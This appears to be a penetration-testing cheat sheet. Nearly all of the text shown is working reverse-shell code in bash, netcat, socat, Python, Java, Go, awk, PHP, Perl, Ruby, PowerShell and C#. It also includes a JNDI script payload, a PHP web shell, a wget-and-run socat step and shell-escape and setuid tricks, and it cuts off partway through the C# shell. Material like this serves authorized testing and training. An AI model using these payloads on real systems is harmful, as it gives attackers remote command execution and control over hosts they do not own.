Collection of possible ways to discover Local File Inclusion (LFI) vulnerabilities and, where possible, how to escalate them to Remote Code Execution (RCE).
Collection of commands that can be used to enumerate information from different TCP and UDP services.
Collection of commands that can be used to fuzz a website, discover information, or crack passwords.
List of typical files worth exploring when a directory traversal is discovered, alongside discovery methods.
Collection of different commands that can be used to transfer files from one device to another.
Collection of commands used for generating certificates or performing certificate-related attacks.
Collection of SQL commands, SQL injection discovery methods and sqlmap commands.
Collection of XML External Entity (XXE) injections and discovery methods.
Collection of Cross-Site Scripting (XSS) tests that can be used to discover XSS vulnerabilities.
Collection of filtering queries and capture commands to use in packet capture and analysis.
Collection of commands to modify application firewalls or bypass network firewalls.
Collection of commands to manage users and groups through different services and protocols.
Collection of commands to communicate with and enumerate information from Azure and the Microsoft Graph API.
Check it Out# OhMyZSH breaks this trick, using sh is recommended # Using STTY # In reverse shell start a PTY $ python3 -c 'import pty;pty.spawn("/bin/bash")' Ctrl-Z # Backgrounds the shell # Execute commands which will be on your machine, not in the shell $ stty raw -echo $ fg # Brings backgrounded shell to active foreground # In your shell now execute $ reset $ export SHELL=bash $ export TERM=xterm-256color $ stty -raw echo OR $ stty rows <num> columns <cols>
# Bash reverse shells over /dev/tcp and /dev/udp. These paths are bash builtins, not real device files,
# so the command line that carries the redirections must be typed into bash (dash/sh will fail),
# even when the program being started is sh.
# Bash UDP Start Listener
nc -u -lvp 4444
# Establish UDP Shell Connection
sh -i >& /dev/udp/127.0.0.1/4444 0>&1
# Bash TCP Start Listener
nc -lvnp 4444
# Establish TCP Shell Connection
sh -i >& /dev/tcp/127.0.0.1/4444 0>&1
# Login-shell variant: stdout goes to the socket first, then stdin and stderr are duplicated from it
# (redirection order matters -- 0<&1 must come after the > redirection)
/bin/bash -l > /dev/tcp/127.0.0.1/4444 0<&1 2>&1
# Open the socket on fd 196 and wire sh's stdin/stdout/stderr to it. The leading 0<&196 runs before
# fd 196 exists and just prints a harmless error; the exec that follows is what opens the socket.
0<&196;exec 196<>/dev/tcp/127.0.0.1/4444; sh <&196 >&196 2>&196
# Non-interactive: read one line at a time from fd 5 and run it through word-splitting.
# No prompt, no job control, and quoting/pipes in the received line will not behave as in a real shell.
exec 5<>/dev/tcp/127.0.0.1/4444;cat <&5 | while read line; do $line 2>&5 >&5; done
# Same idea with an interactive sh on fd 5
sh -i 5<> /dev/tcp/127.0.0.1/4444 0<&5 1>&5 2>&5
# UDP variant (duplicate of the one above; listener needs -u)
sh -i >& /dev/udp/127.0.0.1/4444 0>&1
# sqlite3 CLI escape: .shell runs the classic mkfifo/nc reverse shell from inside the sqlite client
sqlite3 /dev/null '.shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f'
# OpenBSD-style netcat (no -e): a named pipe carries nc's output back into sh's stdin.
# The FIFO is left in /tmp afterwards -- remove it when the session ends.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f
# OpenBSD 2: same trick with mknod creating the FIFO (note the different example port)
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 1337 >/tmp/f
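# netcat-style reverse shells. -e / -c hand the connection directly to a program; most distro netcats
# (OpenBSD nc) are built without them -- fall back to the mkfifo variants above in that case.
nc 127.0.0.1 4444 -e bash
# Windows build of netcat: spawn cmd.exe. The original used "-e bash" here, which only works if a
# Unix shell (Cygwin / Git Bash / WSL) happens to be installed on the Windows target.
nc.exe 127.0.0.1 4444 -e cmd.exe
busybox nc 127.0.0.1 4444 -e bash
# -c runs its argument through a shell (ncat --sh-exec / traditional nc); absent on OpenBSD nc
nc -c sh 127.0.0.1 4444
ncat 127.0.0.1 4444 -e bash
# UDP variant (different example port); the listener must also be started with --udp / -u
ncat --udp 127.0.0.1 1337 -e /bin/bash
ncat.exe 127.0.0.1 4444 -e cmd.exe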
// Java reverse shell via Runtime.exec(String).
// exec(String) splits the string on whitespace, so the argv becomes:
//   bash -c "$@|bash" 0 echo bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
// Inside the child, $0 is "0" and "$@" expands to the remaining words, so "$@|bash" pipes the text
// "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1" into a second bash, which parses the redirections that a
// whitespace-split exec() could never pass unquoted. Exceptions are swallowed: there is nowhere to report them.
public class shell {
    public static void main(String[] args) {
        Process p;
        try {
            p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/127.0.0.1/4444 0>&1");
            p.waitFor();  // keep the JVM alive until the shell exits
            p.destroy();
        } catch (Exception e) {}
    }
}
// Java reverse shell via ProcessBuilder: because the arguments are passed as a list, the script is
// handed to "bash -c" intact and bash itself parses the >& redirection. The leading "$@|" appears to be
// a leftover from the Runtime.exec(String) trick -- with no positional args it expands to an empty command
// in front of the pipe, which bash tolerates. Exceptions are swallowed: there is nowhere to report them.
public class shell {
    public static void main(String[] args) {
        ProcessBuilder pb = new ProcessBuilder("bash", "-c", "$@| bash -i >& /dev/tcp/127.0.0.1/4444 0>&1")
            .redirectErrorStream(true);
        try {
            Process p = pb.start();
            p.waitFor();  // keep the JVM alive until the shell exits
            p.destroy();
        } catch (Exception e) {}
    }
}
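import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

/**
 * Java reverse shell: spawns a shell and shuttles bytes between its stdio and a TCP socket.
 * Stderr is merged into stdout by redirectErrorStream(true), so only one process stream is pumped
 * (the original also polled getErrorStream(), which is an empty stream once merging is enabled).
 * The socket is closed on every exit path including exceptions; the original leaked it on error.
 */
public class shell {
    public static void main(String[] args) {
        String host = "127.0.0.1";
        int port = 4444;
        String cmd = "sh";
        Process p = null;
        try (Socket s = new Socket(host, port)) {
            p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
            InputStream pi = p.getInputStream();
            InputStream si = s.getInputStream();
            OutputStream po = p.getOutputStream();
            OutputStream so = s.getOutputStream();
            while (!s.isClosed()) {
                // Poll with available() so neither direction can block the other.
                while (pi.available() > 0) so.write(pi.read());
                while (si.available() > 0) po.write(si.read());
                so.flush();
                po.flush();
                Thread.sleep(50);
                if (!p.isAlive()) break;  // shell exited (e.g. operator typed `exit`)
            }
        } catch (Exception ignored) {
            // Nowhere to report failures from inside a reverse shell; fall through to cleanup.
        } finally {
            if (p != null) p.destroy();
        }
    }
}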
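# socat reverse shells
# Plain: hand the connection to sh (no TTY)
socat TCP:127.0.0.1:4444 EXEC:sh
# Same, but allocate a PTY and put the shell in its own session so Ctrl-C and job control work
socat TCP:127.0.0.1:4444 EXEC:'sh',pty,stderr,setsid,sigint,sane

# Listener / client pair (add -d -d for verbosity)
# Attacker: listen on 443 and print whatever arrives
socat -d -d TCP4-LISTEN:443 STDOUT
# Victim: connect back and attach a shell. The original repeated the LISTEN command here by mistake;
# the client side must use TCP4: (connect), not TCP4-LISTEN:.
socat TCP4:127.0.0.1:443 EXEC:sh

# SOCAT ENCRYPTED REVERSE SHELL
# bind.pem must contain both the private key and the certificate (e.g. cat key.pem cert.pem > bind.pem)
# Start Listener
socat -d -d OPENSSL-LISTEN:443,cert=bind.pem,verify=0,fork STDOUT
# Connect shell
# LINUX:
socat OPENSSL:127.0.0.1:443,verify=0 EXEC:/bin/bash
# WINDOWS:
socat OPENSSL:127.0.0.1:443,verify=0 EXEC:'cmd.exe',pipes
# NOTE: verify=0 on both ends means neither side authenticates the other -- the traffic is encrypted,
# but anyone who can reach the port (or sit in the path) can take the shell. Pin the listener cert on
# the client (cafile=cert.pem,verify=1) when that matters.

# USE SOCAT FROM ONLINE BINARY
# Attacker: full-TTY listener (local terminal in raw mode so keystrokes pass straight through)
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:1337
# Victim: fetch a static socat build and connect back with a PTY. The port must match the listener
# (1337); the original connected the first variant to 4444.
user@victim$ wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:1337
# Supply-chain caveat: this pulls an unverified third-party binary onto the target at run time.
# Prefer hosting a copy you have checksummed yourself and transferring it from your own infrastructure.
user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:1337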
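# Python reverse shells ("python" = Python 2, "python3" = Python 3; the socket/pty code is identical).
# Host/port taken from the environment so the one-liner itself never changes between engagements.
export RHOST="127.0.0.1";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
# Python 3 versions of the two above. The original had a stray "python -c" in front of the export line,
# which made that entry unrunnable.
export RHOST="127.0.0.1";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
# Threaded variant for platforms without the pty module (e.g. Windows): no TTY, two daemon threads pump
# socket->sh stdin and sh stdout->socket. This is a multi-line script and cannot be passed to -c on one
# line as the original showed; feed it via a heredoc (below) or save it to a file.
# Both pump loops now stop on EOF -- the original spun forever on b"" once the listener disconnected.
python - <<'EOF'
import os,socket,subprocess,threading
def s2p(s, p):
    while True:
        data = s.recv(1024)
        if not data:            # listener went away: give sh EOF so it exits and p.wait() returns
            p.stdin.close()
            break
        p.stdin.write(data)
        p.stdin.flush()
def p2s(s, p):
    while True:
        out = p.stdout.read(1)
        if not out:             # shell exited
            break
        s.send(out)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("127.0.0.1",4444))
p=subprocess.Popen(["sh"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
    p.wait()
except KeyboardInterrupt:
    s.close()
EOF
# Shortest Python 3 form
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("127.0.0.1",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'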
# Windows Python2
# Looks like machine-generated (onelinerizer-style) folding of the threaded s2p/p2s reverse shell above
# into a single expression: two daemon threads pump socket -> cmd.exe stdin and cmd.exe stdout -> socket.
# Python 2 only: it relies on contextlib.nested, which does not exist in Python 3.
python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('127.0.0.1', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
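# Windows Python3
# Two threads: one copies cmd.exe stdout to the socket, the other copies socket data into cmd.exe stdin.
# The original loops never checked for EOF, so once the listener dropped the connection recv()/os.read()
# returned b"" forever and the process spun at 100% CPU. Both loops now exit on EOF and stdin is closed
# so cmd.exe terminates. (The \n escapes are interpreted by Python, not cmd.exe, so this still fits on one line.)
python3.exe -c "import socket,os,threading,subprocess as sp;p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('127.0.0.1',4444));threading.Thread(target=exec,args=(\"while(True):\n o=os.read(p.stdout.fileno(),1024)\n if not o:break\n s.send(o)\",globals()),daemon=True).start();threading.Thread(target=exec,args=(\"while(True):\n i=s.recv(1024)\n if not i:break\n os.write(p.stdin.fileno(),i)\np.stdin.close()\",globals())).start()"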
# IPv6 Python
# AF_INET6 connect() takes a 4-tuple (host, port, flowinfo, scope_id). scope_id (2 here) only matters for
# link-local fe80:: addresses, where it selects the interface -- for a global address it can be 0.
# NOTE(review): the example uses a global dead:beef:: prefix with scope 2; confirm the value on your target.
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4444,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
# IPv6 Python No Spaces Shorthand
# Same payload with every space removed (for filters that split on whitespace): __import__ bound to "a",
# os.dup2 to "o", pty.spawn to "p".
python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4444,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
# awk reverse shell -- gawk only: it relies on the /inet/tcp special file and the |& coprocess operator.
# Prints a "shell>" prompt, reads one line, runs it as a coprocess and streams its output back;
# typing "exit" closes the connection. No TTY, no persistent cwd between commands.
awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
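# Go reverse shell: source is written to a temp file, compiled and run with `go run`, then removed.
# The original discarded the net.Dial error, so a refused connection still started /bin/sh with a nil
# connection (dead stdio) instead of exiting; it now returns early. The source file is removed even when
# the shell exits non-zero (";" instead of "&&") so it does not linger on disk.
echo 'package main;import"os/exec";import"net";func main(){c,err:=net.Dial("tcp","127.0.0.1:4444");if err!=nil{return};cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go; rm -f /tmp/t.go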
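// JNDI reference payload: the lookup target evaluates this JavaScript through javax.script (Nashorn)
// to build the same socket-pumping reverse shell used elsewhere on this page.
// Nashorn shipped with JDK 8-14 only (removed in JDK 15), so this needs an old JVM on the victim.
String command = "var host = '127.0.0.1';"
    + "var port = 4444;"
    + "var cmd = 'sh';"
    + "var s = new java.net.Socket(host, port);"
    + "var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();"
    + "var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();"
    + "var po = p.getOutputStream(), so = s.getOutputStream();"
    + "print ('Connected');"
    + "while (!s.isClosed()) {"
    + " while (pi.available() > 0)"
    + " so.write(pi.read());"
    + " while (pe.available() > 0)"
    + " so.write(pe.read());"
    + " while (si.available() > 0)"
    + " po.write(si.read());"
    + " so.flush();"
    + " po.flush();"
    + " java.lang.Thread.sleep(50);"
    + " try {"
    + " p.exitValue();"
    + " break;"
    + " }"
    + " catch (e) {"
    + " }"
    + "}"
    + "p.destroy();"
    + "s.close();";
// Reflective lookup of ScriptEngineManager so the string survives environments that block the class name directly.
String x = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"" + command + "\")";
// `ref` is the javax.naming.Reference being assembled elsewhere. The original line was missing its closing parenthesis.
ref.add(new StringRefAddr("x", x));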
# OpenSSL-wrapped reverse shell: the command stream is TLS, so it is opaque on the wire.
# Attacker: self-signed certificate (-nodes leaves the key unencrypted so s_server starts unattended)
user@attack$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# Attacker: listener -- either openssl s_server with that cert, or ncat --ssl (which makes its own temporary cert)
user@attack$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
or
user@attack$ ncat --ssl -vv -l -p 4444
# Victim: FIFO feeds s_client output back into sh's stdin. s_client does not reject an unverifiable
# server cert, so anything answering on 4444 can take the shell; the FIFO is removed when s_client exits.
user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:4444 > /tmp/s; rm /tmp/s
// Windows flavour of the socket-pumping Java reverse shell (e.g. for a scriptlet/console context):
// spawns cmd.exe with stderr merged into stdout and relays bytes between the process and the socket.
// pe (getErrorStream) is empty once redirectErrorStream(true) is set; the loop polls available() every
// 50 ms and stops when the process exits (exitValue() throws while it is still running) or the socket closes.
String host="127.0.0.1"; int port=4444; String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();
    Thread.sleep(50);
    try {p.exitValue();break;}catch (Exception e){}  // still running -> keep pumping
};
p.destroy();s.close();
// Linux flavour of the socket-pumping Java reverse shell: identical to the Windows one above except
// that it spawns "sh". Stderr is merged into stdout by redirectErrorStream(true), so the pe stream is
// always empty; the loop polls every 50 ms and ends when the shell exits or the socket closes.
String host="127.0.0.1";int port=4444;String cmd="sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();
    Thread.sleep(50);
    try {p.exitValue();break;}catch (Exception e){}  // still running -> keep pumping
};
p.destroy();s.close();
# Shell Method </bin/sh -i # Python Methods python3 -c 'import pty; pty.spawn("/bin/sh")' python3 -c "__import__('pty').spawn('/bin/bash')" python3 -c "__import__('subprocess').call(['/bin/bash'])" echo os.system('/bin/bash') # Perl Methods perl -e 'exec "/bin/sh";' perl: exec "/bin/sh"; perl -e 'print `/bin/bash`' # Ruby Method ruby: exec "/bin/sh" # Lua Method lua: os.execute('/bin/sh') # Linux Binary Methods # In Vim or Vi text editor vim filename.txt # Opens vim text editor # Press the [ESC] key to enter vi command mode :!bash # Type this command and hit [ENTER] :set shell=/bin/bash:shell # Type this command and hit [ENTER] vim.tiny # Press [ESC] key :set shell=/bin/sh :shell # Type this command and hit [ENTER] vim.basic /root/.bashrc # Nmap Method nmap: !sh nmap --interactive # MySQL Method mysql: ! bash # Less Method less /etc/passwd; !/bin/sh # Which Method which cp; ls -al /bin/cp; chmod u+s /bin/cp # Socat Method # WARNING # Launch /bin/bash in Kali if your default shell is /bin/zsh socat file:`tty`,raw,echo=0 tcp-listen:4444 # On Victim socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:4444
<?php
// Minimal PHP web shell: runs the "cmd" parameter (GET, POST or cookie, via $_REQUEST) through system()
// and prints the raw output. No authentication and no input validation -- anyone who finds the file owns
// the host, so remove it as soon as testing is done.
// The one-liner on the line after the closing tag is the shortest form: it backtick-executes the "0"
// query parameter (?0=id) with the same caveats; the short-echo tag it uses needs PHP 5.4+.
if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?=`$_GET[0]`?>
# PHP reverse shells via php -r. Each opens a TCP socket, then runs "sh <&3 >&3 2>&3": the shell's stdio is
# wired to file descriptor 3, which is where the socket lands when php is started from the CLI with only
# 0/1/2 open. If something else opened a descriptor first (common under a web server) the number may differ
# and the shell will have no I/O -- the proc_open variant at the end avoids that guess entirely.
# The variants differ only in the exec primitive used, which matters when some are blacklisted in disable_functions.
php -r '$sock=fsockopen("127.0.0.1",4444);exec("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("127.0.0.1",4444);shell_exec("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("127.0.0.1",4444);system("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("127.0.0.1",4444);passthru("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("127.0.0.1",4444);`sh <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("127.0.0.1",4444);popen("sh <&3 >&3 2>&3", "r");'
# proc_open passes the socket resource itself as fd 0/1/2 of the child -- no fd-number assumption
php -r '$sock=fsockopen("127.0.0.1",4444);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
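# Perl reverse shells
# On Linux: raw Socket API, STDIN/STDOUT/STDERR dup'ed onto the socket, then an interactive sh is exec'ed
perl -e 'use Socket;$i="127.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# On Linux 2: IO::Socket::INET, forks into the background and runs each received line with system()
# (no TTY; note the different example target 10.0.0.1:1337)
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:1337");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
# On Windows: same as above without the fork. The module switch is -MIO; the original's "-MIO0" was a typo
# that fails with "Can't locate IO0.pm". (Trailing HTML residue from the source page removed on both lines.)
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'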
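# Ruby reverse shells
# Ruby Linux 1: pass the socket as the child's stdin/stdout/stderr. The original repeated the
# "ruby -rsocket -e" prefix twice on this and the next entry, which ruby rejects as an invalid script.
ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("127.0.0.1",4444))'
# Ruby Linux 2: forks into the background, then loops reading lines: "exit" ends it, "cd <dir>" is handled
# in-process (so the working directory persists), anything else runs through IO.popen and its output is sent back
ruby -rsocket -e'exit if fork;c=TCPSocket.new("127.0.0.1","4444");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'
# Ruby Windows: no fork/exec; each received line runs via IO.popen and its output is sent back
ruby -rsocket -e 'c=TCPSocket.new("127.0.0.1","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'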
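# PowerShell reverse shells. All run each received line through Invoke-Expression, so the operator gets
# PowerShell semantics rather than cmd.exe. The original listed variants 2 and 3 twice and carried HTML
# residue ("</span>") at the end of two lines; both are cleaned up here.

# 1. Script form (paste into a PS session or run from a file). Reads whatever is available, decodes it as
#    UTF-8 minus the trailing newline ($RawData - 1), runs it, and writes the output back.
$LHOST = "127.0.0.1"; $LPORT = 4444;
$TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT);
$NetworkStream = $TCPClient.GetStream();
$StreamReader = New-Object IO.StreamReader($NetworkStream);
$StreamWriter = New-Object IO.StreamWriter($NetworkStream);
$StreamWriter.AutoFlush = $true;
$Buffer = New-Object System.Byte[] 1024;
while ($TCPClient.Connected) {
    while ($NetworkStream.DataAvailable) {
        $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length);
        $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1)
    };
    if ($TCPClient.Connected -and $Code.Length -gt 1) {
        $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ };
        $StreamWriter.Write("$Output`n");
        $Code = $null
    }
};
$TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

# 2. One-liner: blocking Read loop, ASCII decoding, prompt shows the current path
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# 3. One-liner with -W hidden (no console window), -noni (non-interactive) and -ep bypass (execution policy);
#    shows a "SHELL> " prompt and decodes input as UTF-8
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('127.0.0.1', 4444);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

# 4. TLS-wrapped version of 3 (pair with an OpenSSL/ncat --ssl listener).
#    NOTE: the RemoteCertificateValidationCallback ({$true}) accepts ANY certificate, and the
#    'cloudflare-dns.com' argument is only the SNI/target name placed in the ClientHello -- the TCP
#    connection still goes to 127.0.0.1:4444. IsEncrypted/IsSigned confirm a cipher was negotiated, not
#    who the peer is, so this gives confidentiality against passive observers but no peer authentication.
$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12;
$TCPClient = New-Object Net.Sockets.TCPClient('127.0.0.1', 4444);
$NetworkStream = $TCPClient.GetStream();
$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));
$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);
if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}
$StreamWriter = New-Object IO.StreamWriter($SslStream);
function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};
WriteToStream '';
while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}
$StreamWriter.Close()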
powershell -e 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
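using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;

namespace ConnectBack
{
    /// <summary>
    /// C# reverse shell: connects to the listener, starts "sh" with redirected stdio and relays lines in
    /// both directions. Process output is forwarded asynchronously via OutputDataReceived.
    /// Fixes vs. the original: stderr was redirected but never read (the child would block once that pipe
    /// filled), and ReadLine() returning null on disconnect was fed to the shell in an endless loop.
    /// </summary>
    public class Program
    {
        static StreamWriter streamWriter;

        public static void Main(string[] args)
        {
            using (TcpClient client = new TcpClient("127.0.0.1", 4444))
            using (Stream stream = client.GetStream())
            using (StreamReader rdr = new StreamReader(stream))
            using (Process p = new Process())
            {
                streamWriter = new StreamWriter(stream);
                p.StartInfo.FileName = "sh";            // cmd.exe / powershell.exe on Windows
                p.StartInfo.CreateNoWindow = true;
                p.StartInfo.UseShellExecute = false;    // required for stdio redirection
                p.StartInfo.RedirectStandardOutput = true;
                p.StartInfo.RedirectStandardInput = true;
                p.StartInfo.RedirectStandardError = true;
                p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
                p.ErrorDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
                p.Start();
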